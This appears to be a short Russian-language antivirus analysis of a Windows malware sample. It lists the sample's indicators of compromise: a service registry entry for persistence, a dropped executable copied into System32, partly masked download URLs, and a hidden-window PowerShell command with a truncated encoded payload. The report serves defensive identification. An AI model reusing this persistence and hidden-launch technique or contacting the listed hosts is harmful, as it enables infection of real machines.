Техническая информация
- [<HKLM>\System\CurrentControlSet\Services\accformat] 'Start' = '00000002'
- [<HKLM>\System\CurrentControlSet\Services\accformat] 'ImagePath' = '"<SYSTEM32>\accformat.exe"'
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -w hidden -en JABBAHoAeQB0AGoAaAB6AGcAYQB1AG0AaQBnAD0AJwBOAHYAeABkAHgAZwBjAGMAYgBuAGcAJwA7ACQATgBuAHkAagB0AGgAYwByAHoAagBvAHkAdgAgAD0AIAAnADkAMwA3ACcAOwAkAEkAaQBxAHMAZgBwAHMAbQA9ACcAUgBvAGcAeAB...
- %HOMEPATH%\937.exe
- %HOMEPATH%\937.exe в <SYSTEM32>\accformat.exe
- http://ah#.#rbdev.com/wp-admin/qp0/
- http://68.##4.229.171/XM5JME2x06Mt
- DNS ASK ah#.#rbdev.com
- '%HOMEPATH%\937.exe'
- '<SYSTEM32>\accformat.exe'
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -w hidden -en JABBAHoAeQB0AGoAaAB6AGcAYQB1AG0AaQBnAD0AJwBOAHYAeABkAHgAZwBjAGMAYgBuAGcAJwA7ACQATgBuAHkAagB0AGgAYwByAHoAagBvAHkAdgAgAD0AIAAnADkAMwA3ACcAOwAkAEkAaQBxAHMAZgBwAHMAbQA9ACcAUgBvAGcAeAB...' (со скрытым окном)